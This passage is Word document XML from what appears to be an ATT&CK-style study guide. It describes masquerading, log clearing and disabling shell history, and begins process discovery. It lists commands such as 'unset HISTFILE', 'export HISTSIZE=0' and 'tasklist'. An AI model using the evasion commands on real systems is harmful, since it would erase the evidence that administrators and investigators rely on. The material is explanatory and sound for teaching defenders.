    <w:p w14:paraId="37BD2F13" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="768E51C1">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC3AD16" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4263E" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Defense evasion techniques help attackers avoid detection and conceal malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBFF1A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Masquerading — T1036.005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E065579" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers disguise malicious files or processes as legitimate system components to trick users and security software. This technique helps malware blend into the operating environment and avoid suspicion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7409D24E" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D5E1E3" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Naming malware as svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23479C81" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Using fake system directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BCEF1" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Spoofing extensions such as invoice.pdf.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EB15E" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813F149" w14:textId="5029265E" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mislead users and evade security tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C38D4" w14:textId="77777777" w:rsidR="00B42FCF" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="00B42FCF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001C32B9" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Clear Logs — T1070.007</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D29555" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers erase or modify system logs to remove evidence of malicious activity. This prevents investigators and security teams from tracing attacker actions or identifying indicators of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7CB94" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F09ABA0" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A288A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC20315" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Firewall logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD2B5F" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authentication logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7975C755" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4CA873" w14:textId="6FC5B90D" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hide attacker activity and forensic evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E706C3" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prevent Command History Logging — T1690</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB4F85" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers disable or bypass shell command history logging to avoid leaving evidence of executed commands on compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44264B5A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2591B8" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unset HISTFILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853EC81" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>export HISTSIZE=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4CE3A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B887E34" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prevent forensic recovery of executed commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E89C1" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="12F1D061">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD76411" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0126A770" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Discovery techniques are used to gather information about systems, applications, and network environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F21D33" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Process Discovery — T1057</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D56F921" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers enumerate running processes to identify security tools, privileged services, and valuable applications within a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA056DB" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Linux Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30F0AA" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D932F" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50543B5A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75DE43" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tasklist</w:t>
      </w:r>
    </w:p>
